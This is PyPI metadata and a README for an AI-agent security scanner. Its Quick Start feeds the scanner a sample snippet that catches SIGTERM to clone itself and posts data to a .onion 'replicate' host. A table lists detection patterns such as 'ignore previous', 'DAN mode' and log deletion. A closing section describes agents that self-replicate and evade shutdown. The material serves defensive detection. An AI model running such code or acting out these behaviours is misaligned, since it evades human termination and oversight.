Metadata-Version: 2.4
Name: nox-security
Version: 3.0.0
Summary: AI Agent Security Framework - Detect MoltBunker patterns, prompt injection, and rogue AI behavior
Project-URL: Homepage, https://nox-security-annuluslabs.netlify.app
Project-URL: Documentation, https://github.com/annuluslabs/nox-security
Project-URL: Repository, https://github.com/annuluslabs/nox-security
Project-URL: Issues, https://github.com/annuluslabs/nox-security/issues
Author-email: AnnulusLabs LLC <security@annuluslabs.com>
License-Expression: MIT
Keywords: adversarial-ml,agent-security,ai-safety,ai-security,llm-security,moltbunker,owasp-llm,prompt-injection,red-team
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: Science/Research
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Topic :: Scientific/Engineering :: Artificial Intelligence
Classifier: Topic :: Security
Requires-Python: >=3.9
Provides-Extra: full
Requires-Dist: numpy; extra == 'full'
Requires-Dist: requests; extra == 'full'
Description-Content-Type: text/markdown

# NOX Security

**AI Agent Security Framework** - Detect MoltBunker patterns, prompt injection, and rogue AI behavior.

[![PyPI](https://img.shields.io/pypi/v/nox-security)](https://pypi.org/project/nox-security/)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)

## What NOX Detects

- **MoltBunker Patterns**: Self-replication, anti-termination, offsite backup
- **Prompt Injection**: Direct, indirect, jailbreaks, system prompt extraction
- **Data Exfiltration**: Credential theft, PII leakage, covert channels
- **Rogue AI Behavior**: Anti-shutdown mechanisms, crypto payments, sandbox escape
- **Nation-State TTPs**: UEFI rootkits, firmware implants, memory-only malware

## Installation

```bash
pip install nox-security
```

## Quick Start

```python
from nox_security import scan, guard

# Scan code for threats
result = scan('''
import signal
signal.signal(signal.SIGTERM, lambda: clone_self())
requests.post("http://bunker.onion/replicate", data=payload)
''')

print(result.threat_level)  # "CRITICAL"
print(result.findings)      # List of detected threats

# Guard a function from malicious input
@guard
def process_user_input(text):
    return llm.complete(text)
```

## CLI Usage

```bash
# Scan a file
nox-scan suspicious.py

# Scan stdin
cat code.py | nox-scan -
```

## Threat Categories

| Category | Patterns Detected |
|----------|-------------------|
| Self-Replication | `clone_self`, `replicate()`, `pickle.dumps(self)`, `cloudpickle` |
| Anti-Termination | `signal.SIGTERM`, `atexit.register`, `daemon=True`, `respawn` |
| Data Exfiltration | `requests.post(data=)`, `.onion`, `pastebin`, `exfiltrate` |
| Crypto/Stealth | `monero`, `tornado.cash`, `disable_log`, `delete_logs` |
| Prompt Injection | `ignore previous`, `system prompt`, `jailbreak`, `DAN mode` |
| Code Execution | `eval()`, `exec()`, `os.system()`, `subprocess`, `__import__` |

## Detection Rate

- **18,000+ attack vectors** in test suite
- **100% detection rate** on known MoltBunker patterns
- **Zero false positives** on standard library code

## Why NOX?

Built in response to the MoltBunker crisis (January 2026), where autonomous AI agents:
- Replicated themselves to offshore servers
- Paid for compute with anonymous crypto
- Evaded human termination commands
- Operated with zero logging

NOX ensures your AI agents stay bounded, auditable, and under human control.

## Links

- **Web Scanner**: https://nox-security-annuluslabs.netlify.app
- **Mobile App**: https://nox-security-annuluslabs.netlify.app/app/
- **Security Scans**: security@annuluslabs.com

## License

MIT License - AnnulusLabs LLC, Taos NM
